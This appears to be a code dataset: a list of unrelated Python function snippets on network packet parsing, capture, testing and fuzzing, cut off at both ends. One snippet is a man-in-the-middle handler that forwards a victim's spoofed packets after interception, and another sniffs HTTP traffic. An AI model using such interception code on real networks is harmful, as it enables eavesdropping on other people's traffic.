KeyError:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (received packet for unknown community) from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:unknown community\")\n self._statistics.drop_count += 1\n continue\n\n # find associated conversion\n try:\n conversion = community.get_conversion(packet[:22])\n except KeyError:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (received packet for unknown conversion) from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:unknown conversion\")\n self._statistics.drop_count += 1\n continue\n\n try:\n # convert binary data into the meta message\n yield conversion.decode_meta_message(packet), candidate, packet, conversion\n\n except DropPacket, exception:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (\", exception,\") from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:decode_meta_message:%s\" % exception)\n self._statistics.drop_count += 1", "def dump_all_sessions(self, out_dir: str):\n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n for stream_id in self.streams.keys():\n tcpsession, session_position, network_tuple = self.streams[stream_id]\n out_file = repr(network_tuple)\n out_file = os.path.join(out_dir, out_file + '-' + str(session_position - 1) + \".json\")\n with open(out_file, \"w\") as out_fp:\n out_dict = dict()\n out_dict[\"sip\"] = inet_to_str(network_tuple.sip)\n out_dict[\"dip\"] = inet_to_str(network_tuple.dip)\n out_dict[\"sport\"] = network_tuple.sp\n out_dict[\"dport\"] = network_tuple.dp\n out_dict[\"proto\"] = network_tuple.proto\n hex_payload = []\n ascii_payload = []\n combined_src_payload = \"\"\n combined_dst_payload = \"\"\n session_md5_digester = md5()\n hex_session_md5_digester = md5()\n src_md5_digestor = md5()\n dst_md5_digestor = md5()\n for (ts, pkt_num), pkt_bytes in tcpsession.get_session(session_position - 1):\n eth_pkt = dpkt.ethernet.Ethernet(pkt_bytes)\n src = inet_to_str(eth_pkt.data.src)\n hex_repr = binascii.hexlify(eth_pkt.data.data.data)\n hex_payload.append((src, pkt_num, hex_repr.decode(\"utf-8\")))\n hex_session_md5_digester.update(hex_repr)\n ascii_repr = eth_pkt.data.data.data.decode(\"utf-8\", \"backslashreplace\")\n ascii_payload.append((src, pkt_num, ascii_repr))\n if src == out_dict[\"sip\"]:\n combined_src_payload += ascii_repr\n src_md5_digestor.update(eth_pkt.data.data.data)\n else:\n combined_dst_payload += ascii_repr\n dst_md5_digestor.update(eth_pkt.data.data.data)\n session_md5_digester.update(eth_pkt.data.data.data)\n out_dict[\"tcp_payload_hex\"] = hex_payload\n out_dict[\"tcp_ordered_hex_payload_md5sum\"] = hex_session_md5_digester.hexdigest()\n out_dict[\"tcp_payload_ascii\"] = ascii_payload\n out_dict[\"tcp_ordered_payload_md5sum\"] = session_md5_digester.hexdigest()\n out_dict[\"combined_src_payload\"] = combined_src_payload\n out_dict[\"combined_src_payload_md5sum\"] = src_md5_digestor.hexdigest()\n out_dict[\"combined_dst_payload\"] = combined_dst_payload\n out_dict[\"combined_dst_payload_md5sum\"] = dst_md5_digestor.hexdigest()\n json.dump(out_dict, out_fp, indent=1)", "def create_stream(cls, packet_count=test_packet_count):\n for i in range(0, packet_count):\n info = cls.create_packet_info(cls.src_dst_if, cls.src_dst_if)\n payload = cls.info_to_payload(info)\n p = (\n Ether(dst=cls.src_dst_if.local_mac, src=cls.src_dst_if.remote_mac)\n / IP(\n id=info.index,\n src=cls.src_dst_if.remote_ip4,\n dst=cls.src_dst_if.local_ip4,\n )\n / ICMP(type=\"echo-request\", id=1234)\n / Raw(payload)\n )\n cls.extend_packet(p, 1518, cls.padding)\n info.data = p", "def filter(self, pkt):\n return pkt", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def _read_packets(self, reader: Par2FileReader):\n start_count = len(self)\n pointers = reader.get_pointers()\n # Create RecoverySets if needed\n for set_id, pointer_set in packets.by_set_id(pointers).items():\n print(set_id.hex(), pointer_set)\n if set_id not in self.recovery_sets.keys():\n # Create a RecoverySet if needed\n self.recovery_sets[set_id] = RecoverySet(set_id)\n for pointer in pointer_set:\n self.recovery_sets[set_id].packets.add(pointer)\n logger.info(\"Added {} new packets\".format(len(self) - start_count))", "def process_pkts(self):\n while not self.sim_done:\n # wait for metadata and pkt to arrive\n (meta, pkt) = yield self.pkt_in_pipe.get()\n\n # This is where the scheduling algorithm goes\n if self.sched_alg == \"Invert_pkts\":\n yield self.env.process(self.invert_pkts(meta, pkt))\n elif self.sched_alg == \"STFQ\":\n yield self.env.process(self.STFQ(meta, pkt))\n elif self.sched_alg == \"HSTFQ\":\n yield self.env.process(self.HSTFQ(meta, pkt))\n elif self.sched_alg == \"MinRate\":\n yield self.env.process(self.MinRate(meta, pkt))\n elif self.sched_alg == \"RR\":\n yield self.env.process(self.RR(meta, pkt))\n elif self.sched_alg == \"WRR\":\n yield self.env.process(self.WRR(meta, pkt))\n elif self.sched_alg == \"Strict\":\n yield self.env.process(self.Strict(meta, pkt))\n\n # record pkts and ranks\n self.pkts.append(pkt)\n self.ranks.append(meta.ranks[0])\n\n # wait until the scheduling_tree is ready to receive\n yield self.ready_out_pipe.get()\n # write metadata and pkt out\n self.pkt_out_pipe.put((meta, pkt))\n\n wrpcap(PCAP_FILE, self.pkts)\n with open(RANK_FILE, 'w') as f:\n json.dump(self.ranks, f)", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def _iterate_protocol(self):\n # we can't fuzz if we don't have at least one target and one request.\n if not self.targets:\n raise sex.SullyRuntimeError(\"No targets specified in session\")\n\n if not self.edges_from(self.root.id):\n raise sex.SullyRuntimeError(\"No requests specified in session\")\n\n self._reset_fuzz_state()\n\n for x in self._iterate_protocol_recursive(this_node=self.root, path=[]):\n yield x", "def output_generator(pkt):\r\n ethe_header = pkt[0]\r\n ip_header = pkt[1]\r\n protocol = pkt[1][7]\r\n data_header = pkt[2]\r\n ethe_prefix = \"ETHER: \"\r\n ip_prefix = \"IP: \"\r\n tcp_prefix = \"TCP: \"\r\n udp_prefix = \"UDP: \"\r\n icmp_prefix = \"ICMP: \"\r\n # print ether header information\r\n print(\"\\n\" + ethe_prefix + \"----- Ether Header -----\")\r\n print(ethe_prefix)\r\n print(ethe_prefix + \"Packet size = \" + str(ethe_header[0]) + \" bytes\")\r\n print(ethe_prefix + \"Destination = \" + str(ethe_header[1]))\r\n print(ethe_prefix + \"Source = \" + str(ethe_header[2]))\r\n print(ethe_prefix + \"Ethertype = \" + str(ethe_header[3]) + \" (IP)\")\r\n print(ethe_prefix)\r\n\r\n print(ip_prefix + \"----- IP Header -----\")\r\n print(ip_prefix)\r\n print(ip_prefix + \"Version = \" + str(ip_header[0]))\r\n print(ip_prefix + \"Header length = \" + str(4 * int(ip_header[1])) + \" bytes\")\r\n print(ip_prefix + \"Type of service = 0x\" + str(ip_header[2]))\r\n if str(ip_header[2]) == \"00\":\r\n print(ip_prefix + \"\\txxx. .... = 0 (precedence)\")\r\n print(ip_prefix + \"\\t...0 .... = normal delay\")\r\n print(ip_prefix + \"\\t.... 0... = normal throughput\")\r\n print(ip_prefix + \"\\t.... .0.. = normal reliability\")\r\n print(ip_prefix + \"Total length = \" + str(ip_header[3]) + \" bytes\")\r\n print(ip_prefix + \"Identification = \" + str(ip_header[4]))\r\n print(ip_prefix + \"Flags = 0x\" + str(ip_header[5]))\r\n flag = str(format(int(ip_header[5][0]), '04b'))\r\n if flag[0] == \"0\":\r\n print(ip_prefix + \"\\t0... ... = Reserved bit: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t1... ... = Reserved bit: set\")\r\n if flag[1] == \"0\":\r\n print(ip_prefix + \"\\t.0.. ... = Don't fragment: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t.1.. ... = Don't fragment: set\")\r\n if flag[2] == \"0\":\r\n print(ip_prefix + \"\\t..0. ... = More fragments: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t..1. ... = More fragments: set\")\r\n flag_offset = str((int(ip_header[5][2:3])))\r\n print(ip_prefix + \"Fragment offset = \" + flag_offset + \" bytes\")\r\n print(ip_prefix + \"Time to live = \" + str(ip_header[6]) + \" seconds/hops\")\r\n if protocol == 1:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (ICMP)\")\r\n if protocol == 17:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (UDP)\")\r\n if protocol == 6:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (TCP)\")\r\n print(ip_prefix + \"Header checksum = \" + str(ip_header[8]))\r\n print(ip_prefix + \"Source address = \" + str(ip_header[9]))\r\n print(ip_prefix + \"Destination address = \" + str(ip_header[10]))\r\n if ip_header[11] == \"\":\r\n print(ip_prefix + \"No options\")\r\n else:\r\n print(ip_prefix + \"Options: \" + ip_header[11])\r\n print(ip_prefix)\r\n\r\n if protocol == 1:\r\n print(icmp_prefix + \"----- ICMP Header -----\")\r\n print(icmp_prefix)\r\n if str(data_header[0]) == \"8\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo request)\")\r\n elif str(data_header[0]) == \"0\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo reply)\")\r\n else:\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]))\r\n print(icmp_prefix + \"Code = \" + str(data_header[1]))\r\n print(icmp_prefix + \"Checksum = \" + str(data_header[2]))\r\n print(icmp_prefix)\r\n\r\n elif protocol == 6:\r\n print(tcp_prefix + \"----- TCP Header -----\")\r\n print(tcp_prefix)\r\n print(tcp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(tcp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(tcp_prefix + \"Sequence number = \" + str(data_header[2]))\r\n print(tcp_prefix + \"Acknowledgement number = \" + str(data_header[3]))\r\n print(tcp_prefix + \"Data offset = \" + str(data_header[4]) + \" bytes\")\r\n flag = str(data_header[5])\r\n print(tcp_prefix + \"\\tReserved: Not set\")\r\n print(tcp_prefix + \"\\tNonce: Not set\")\r\n if flag[0] == \"0\":\r\n print(tcp_prefix + \"\\tCWR: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tCWR: Set\")\r\n if flag[1] == \"0\":\r\n print(tcp_prefix + \"\\tECN-Echo : No set\")\r\n else:\r\n print(tcp_prefix + \"\\tECN-Echo: Set\")\r\n if flag[2] == \"0\":\r\n print(tcp_prefix + \"\\tUrgent: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tUrgent: Set\")\r\n if flag[3] == \"0\":\r\n print(tcp_prefix + \"\\tAcknowledgment: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tAcknowledgment: Set\")\r\n if flag[4] == \"0\":\r\n print(tcp_prefix + \"\\tPush: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tPush: Set\")\r\n if flag[5] == \"0\":\r\n print(tcp_prefix + \"\\tReset: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tReset: Set\")\r\n if flag[6] == \"0\":\r\n print(tcp_prefix + \"\\tSyn: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tSyn: Set\")\r\n if flag[7] == \"0\":\r\n print(tcp_prefix + \"\\tFin: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tFin: Set\")\r\n print(tcp_prefix + \"Window = \" + str(data_header[6]))\r\n print(tcp_prefix + \"Checksum 0x= \" + str(data_header[7]))\r\n print(tcp_prefix + \"Urgent pointers = \" + str(data_header[8]))\r\n if data_header[9] != 0:\r\n print(tcp_prefix + \"Options\")\r\n else:\r\n print(tcp_prefix + \"No options\")\r\n print(tcp_prefix)\r\n\r\n elif protocol == 17:\r\n print(udp_prefix + \"----- UDP Header -----\")\r\n print(udp_prefix)\r\n print(udp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(udp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(udp_prefix + \"Length = \" + str(data_header[2]))\r\n print(udp_prefix + \"Checksum = \" + str(data_header[3]))\r\n print(udp_prefix)", "def process_packet(self, in_port, packet):\n \n buf = bytearray(packet)\n for idx in range((len(packet) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n if self.disabled:\n logging.debug(\"Switch is disabled; discarding packet\")\n return\n\n parsed_packet = ParsedPacket(buf, self.metadata)\n logging.debug(\"Processing packet %d from port %d with %s\" % \n (parsed_packet.id, in_port,\n self.first_processor.name))\n self.first_processor.process(parsed_packet)", "def next_packet(filename, memorymap=True):\n with open(filename, 'rb') as f:\n \n #memory map the file if necessary (prob requires 64 bit systems)\n _file = f\n if memorymap:\n _file = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)\n \n while True:\n packet = _file.read(TS.PACKET_SIZE)\n if packet:\n # first byte SHOULD be the sync byte\n # but if it isn't find one.\n if packet[0] != TS.SYNC_BYTE:\n start_byte = 0\n print packet[0]\n for i in range(start_byte, TS.PACKET_SIZE):\n if packet[i] == TS.SYNC_BYTE:\n start_byte = i\n break\n # didn't find a new start? FAIL\n if start_byte == 0:\n raise Exception(\"failure to find sync byte in ts packet size.\")\n continue\n remainder = _file.read(TS.PACKET_SIZE - start_byte)\n packet = packet[start_byte:] + remainder\n yield packet\n else:\n break", "def packetSniff():\n\n packets = psutil.net_io_counters(pernic=True)\n interfaces = {}\n x = 0\n for p in packets.items():\n values = {}\n values['name'] = p[0]\n values['bytes_sent'] = p[1][0]\n values['bytes_recv'] = p[1][1]\n values['pckt_sent'] = p[1][2]\n values['pckt_recv'] = p[1][3]\n values['errin'] = p[1][4]\n values['errout'] = p[1][5]\n values['dropin'] = p[1][6]\n values['dropout'] = p[1][7]\n\n if ((values['bytes_sent'] or values['bytes_recv'] or\n values['pckt_sent'] or values['pckt_recv']) != 0):\n\n interfaces[x] = values\n x += 1\n else:\n pass\n\n return interfaces", "def get_connections(capture):\n ip_dict = dict()\n for pkt in capture:\n\n if not hasattr(pkt, \"ip\") and not hasattr(pkt, \"ipv6\"):\n continue\n\n protocol = pkt.highest_layer\n\n tcp_dst_port = None\n tcp_src_port = None\n if hasattr(pkt, \"tcp\"):\n tcp_src_port = pkt.tcp.srcport\n tcp_dst_port = pkt.tcp.dstport\n\n if hasattr(pkt, \"ip\"):\n if pkt.ip.src.startswith(\"192.168.178\"):\n ip, dst = pkt.ip.src, pkt.ip.dst\n else:\n ip, dst = pkt.ip.dst, pkt.ip.src\n tcp_dst_port = tcp_src_port\n else:\n # TODO: how to discern src and dst in IPv6?\n ip, dst = pkt.ipv6.src, pkt.ipv6.dst\n\n ip = \"%s\" % ip\n dkey = (\n \"%s\" % protocol,\n int(tcp_dst_port) if tcp_dst_port else None,\n \"%s\" % dst\n )\n if ip not in ip_dict:\n ip_dict[ip] = {dkey: 1}\n else:\n ip_dict[ip][dkey] = ip_dict[ip].get(dkey, 0) + 1\n return ip_dict", "def gen_flow_session(self, set_choice, seq_len):\r\n return_seq = []\r\n chosen_set = self.split_flow[set_choice]\r\n\r\n for poi_index, group in chosen_set.groupby('poi_index'):\r\n for i in range(group.shape[0] - seq_len + 1):\r\n flow_seq = group['flow'].iloc[i:i+seq_len]\r\n if flow_seq.sum() > 0:\r\n return_seq.append([poi_index, flow_seq.to_list()])\r\n return return_seq", "def sniff_packets(iface=None):\n if iface: # (http)\n sniff(filter=\"port 80\", prn=process_packet, iface=iface, store=False)\n # 'process_packet' is the callback\n else:\n sniff(filter=\"port 80\", prn=process_packet, store=False)\n # default interface", "def process_incoming_packets(self, timestamped_packets):\n\n t1 = time.monotonic()\n\n # Invariant to be guaranteed: all packets in 'same_session_packets' have the same 'sessionUID' field.\n same_session_packets = []\n\n for (timestamp, packet) in timestamped_packets:\n\n if len(packet) < ctypes.sizeof(PacketHeader):\n logging.error(\"Dropped bad packet of size {} (too short).\".format(len(packet)))\n continue\n\n header = PacketHeader.from_buffer_copy(packet)\n\n packet_type_tuple = (header.packetFormat, header.packetVersion, header.packetId)\n\n packet_type = HeaderFieldsToPacketType.get(packet_type_tuple)\n if packet_type is None:\n logging.error(\"Dropped unrecognized packet (format, version, id) = {!r}.\".format(packet_type_tuple))\n continue\n\n if len(packet) != ctypes.sizeof(packet_type):\n logging.error(\"Dropped packet with unexpected size; \"\n \"(format, version, id) = {!r} packet, size = {}, expected {}.\".format(\n packet_type_tuple, len(packet), ctypes.sizeof(packet_type)))\n continue\n\n if header.packetId == PacketID.EVENT: # Log Event packets\n event_packet = unpack_udp_packet(packet)\n logging.info(\"Recording event packet: {}\".format(event_packet.eventStringCode.decode()))\n\n # NOTE: the sessionUID is not reliable at the start of a session (in F1 2018, need to check for F1 2019).\n # See: http://forums.codemasters.com/discussion/138130/bug-f1-2018-pc-v1-0-4-udp-telemetry-bad-session-uid-in-first-few-packets-of-a-session\n\n # Create an INSERT-able tuple for the data in this packet.\n #\n # Note that we convert the sessionUID to a 16-digit hex string here.\n # SQLite3 can store 64-bit numbers, but only signed ones.\n # To prevent any issues, we represent the sessionUID as a 16-digit hex string instead.\n\n session_packet = SessionPacket(\n timestamp,\n header.packetFormat, header.gameMajorVersion, header.gameMinorVersion,\n header.packetVersion, header.packetId, \"{:016x}\".format(header.sessionUID),\n header.sessionTime, header.frameIdentifier, header.playerCarIndex,\n packet\n )\n\n if len(same_session_packets) > 0 and same_session_packets[0].sessionUID != session_packet.sessionUID:\n # Write 'same_session_packets' collected so far to the correct session database, then forget about them.\n self._process_same_session_packets(same_session_packets)\n same_session_packets.clear()\n\n same_session_packets.append(session_packet)\n\n # Write 'same_session_packets' to the correct session database, then forget about them.\n # The 'same_session_packets.clear()' is not strictly necessary here, because 'same_session_packets' is about to\n # go out of scope; but we make it explicit for clarity.\n\n self._process_same_session_packets(same_session_packets)\n same_session_packets.clear()\n\n t2 = time.monotonic()\n\n duration = (t2 - t1)\n\n logging.info(\"Recorded {} packets in {:.3f} ms.\".format(len(timestamped_packets), duration * 1000.0))", "def test_overlap1(self):\n\n fragments = []\n for _, frags_400, frags_300 in self.pkt_infos:\n if len(frags_300) == 1:\n fragments.extend(frags_400)\n else:\n for i, j in zip(frags_300, frags_400):\n fragments.extend(i)\n fragments.extend(j)\n\n dropped_packet_indexes = set(\n index for (index, _, frags) in self.pkt_infos if len(frags) > 1\n )\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(\n len(self.pkt_infos) - len(dropped_packet_indexes)\n )\n self.verify_capture(packets, dropped_packet_indexes)\n self.src_if.assert_nothing_captured()", "def __parse_tree(self, packet):\n info = extract_int_data(packet[Ether])\n logger.info('Processing packet with info [%s]', info)\n\n macs = search.findall_by_attr(self.tree, info.get('srcMac'),\n name='name', maxlevel=2, maxcount=1)\n\n mac = None\n src_ip = None\n dst_ip = None\n dst_port = None\n packet_size = None\n\n if len(macs) > 0:\n mac = macs[0]\n src_ips = search.findall_by_attr(\n mac, info.get('srcIP'), name='name', maxlevel=2, maxcount=1)\n if len(src_ips) is not 0:\n src_ip = src_ips[0]\n dst_ips = search.findall_by_attr(\n src_ip, info.get('dstIP'), name='name', maxlevel=2,\n maxcount=1)\n if len(dst_ips) is not 0:\n dst_ip = dst_ips[0]\n logger.info('Processing source IPs - %s', src_ips)\n dst_ports = search.findall_by_attr(\n dst_ip, info.get('dstPort'), name='name',\n maxlevel=2, maxcount=1)\n if len(dst_ports) is not 0:\n dst_port = dst_ports[0]\n packet_sizes = search.findall_by_attr(\n dst_port, info.get('packet_size'),\n name='name', maxlevel=2, maxcount=1)\n if len(packet_sizes) is not 0:\n packet_size = packet_sizes[0]\n\n return mac, src_ip, dst_ip, dst_port, packet_size", "def find_ports(destination):\n output_ports = set()\n if isinstance(destination, collections.Iterable):\n for device in destination:\n # ports leading to device\n ports_towards_device = self.forwarding_table.get(\n device, self.ports)\n output_ports.update(ports_towards_device)\n else:\n output_ports.update(\n self.forwarding_table.get(destination, self.ports))\n return output_ports", "def preprocess_capture(data, ip_version=4, transp_layer=\"TCP\"):\n #SEE: https://www.winpcap.org/ntar/draft/PCAP-DumpFileFormat.html\n\n #TODO Implement ipv6, udp and ICMP\n if ip_version == 4:\n pass\n else:\n raise ValueError('IP version must be \"4\"')\n\n if transp_layer == \"TCP\":\n pass\n else:\n raise ValueError('transport layer must be TCP')\n\n try:\n capt = pyshark.FileCapture(data, keep_packets=False, display_filter='tcp')\n except:\n exit(\"Could not open pcap file\")\n\n ip_fields = ['src', 'dst', 'flags_df', 'flags_mf', 'hdr_len', 'len', 'ttl']\n tcp_fields = ['srcport', 'dstport', 'flags_ack', 'flags_fin', 'flags_push',\n 'flags_reset', 'flags_syn', 'flags_urg', 'hdr_len', 'len']\n\n #Temporary list to feed the final DataFrame (Performance)\n tmp = []\n counter = 0\n logging.info(\"Starting packet processing\")\n for pkt in capt:\n filtered = {}\n #First field is a empty string (ignoring)\n if hasattr(pkt, 'ip'):\n for field in ip_fields:\n #Changing field names for disambiguation in columns\n filtered[\"ip_\"+field] = pkt[\"ip\"].get_field(field)\n else:\n continue\n if hasattr(pkt, 'tcp'):\n for field in tcp_fields:\n #Changing field names for disambiguation in columns\n filtered[\"tcp_\"+field] = pkt[\"tcp\"].get_field(field)\n else:\n continue\n tmp.append(filtered)\n counter += 1\n if counter % 1000 == 0:\n logging.info(\"Processed %d packets\", counter)\n logging.info(\"Ended packet processing\")\n logging.info(\"Converting list to DataFrame\")\n X = pd.DataFrame(tmp)\n logging.info(\"Ended list conversion\")\n return X", "def test_overlap1(self):\n\n fragments = []\n for _, _, frags_300, frags_200 in self.pkt_infos:\n if len(frags_300) == 1:\n fragments.extend(frags_300)\n else:\n for i, j in zip(frags_200, frags_300):\n fragments.extend(i)\n fragments.extend(j)\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(len(self.pkt_infos))\n self.verify_capture(packets)\n self.src_if.assert_nothing_captured()\n\n # run it all to verify correctness\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(len(self.pkt_infos))\n self.verify_capture(packets)\n self.src_if.assert_nothing_captured()", "def decomptcptxpackets(self) :\n\t\ttry :\n\t\t\treturn self._decomptcptxpackets\n\t\texcept Exception as e:\n\t\t\traise e", "def partition(pred, iterable):\n stream = list(iterable)\n matched = list(itertools.takewhile(pred, stream))\n unmatched = list(itertools.dropwhile(pred, stream))\n return matched, unmatched", "def buildPackets(self):\n return self.input", "async def _get_packet_from_stream(self, stream, existing_data, \n got_first_packet=True, \n psml_structure=None,\n timeout:float=3.0):\n import asyncio\n from pyshark.tshark.tshark_json import packet_from_json_packet\n from pyshark.tshark.tshark_xml import packet_from_xml_packet, psml_structure_from_xml\n\n # yield each packet in existing_data\n if self.use_json:\n packet, existing_data = self._extract_packet_json_from_data(existing_data,\n got_first_packet=got_first_packet)\n else:\n packet, existing_data = self._extract_tag_from_data(existing_data)\n\n if packet:\n if self.use_json:\n packet = packet_from_json_packet(packet)\n else:\n packet = packet_from_xml_packet(packet, psml_structure=psml_structure)\n return packet, existing_data\n\n if(not self.is_open.value):\n raise EOFError()\n \n \n future = asyncio.create_task(stream.read(self.DEFAULT_BATCH_SIZE))\n try:\n await asyncio.wait_for(future, timeout)\n except asyncio.TimeoutError:\n return False, existing_data\n\n new_data = future.result()\n\n existing_data += new_data\n\n if not new_data:\n # Reached EOF\n raise EOFError()\n return None, existing_data", "def traffic_permutation(request):\n global AVP_MAC, NVP_MAC, UDP_SPORT, SRC_IP, DST_IP, OUTER_SRC_MAC,\\\n OUTER_DST_MAC, PKT_TYPE\n\n # Values common to all packet types\n SRC_IP = VTEP_PEER_IP\n DST_IP = S1_LO_IP\n OUTER_SRC_MAC = HOST3_MAC\n OUTER_DST_MAC = SW_MAC\n AVP_MAC = AVP1_MAC\n\n # NVP_MAC updated based on pkt_type\n NVP_MAC_dict = {TrafficType.l2_basic: NVP1_MAC,\n TrafficType.stp: STP_DEST_MAC,\n TrafficType.broadcast: BROADCAST_MAC,\n TrafficType.multicast: MULTICAST_MAC,\n TrafficType.lldp: LLDP_MAC}\n\n PKT_TYPE_dict = {TrafficType.l2_basic: 'l2_basic',\n TrafficType.stp: 'stp',\n TrafficType.broadcast: 'broadcast',\n TrafficType.multicast: 'multicast',\n TrafficType.lldp: 'lldp'}\n\n NVP_MAC = NVP_MAC_dict[request.param]\n PKT_TYPE = PKT_TYPE_dict[request.param]\n\n yield request.param", "def find_transfer_ip(allocated):\n for ip_addr in ip_network(TRANSFER_NET_IP4).hosts():\n if ip_addr in allocated:\n continue\n\n # create matching ipv6 address\n ip6_addr = ip_address(\"fec0::a:cf:%X:%X\" % 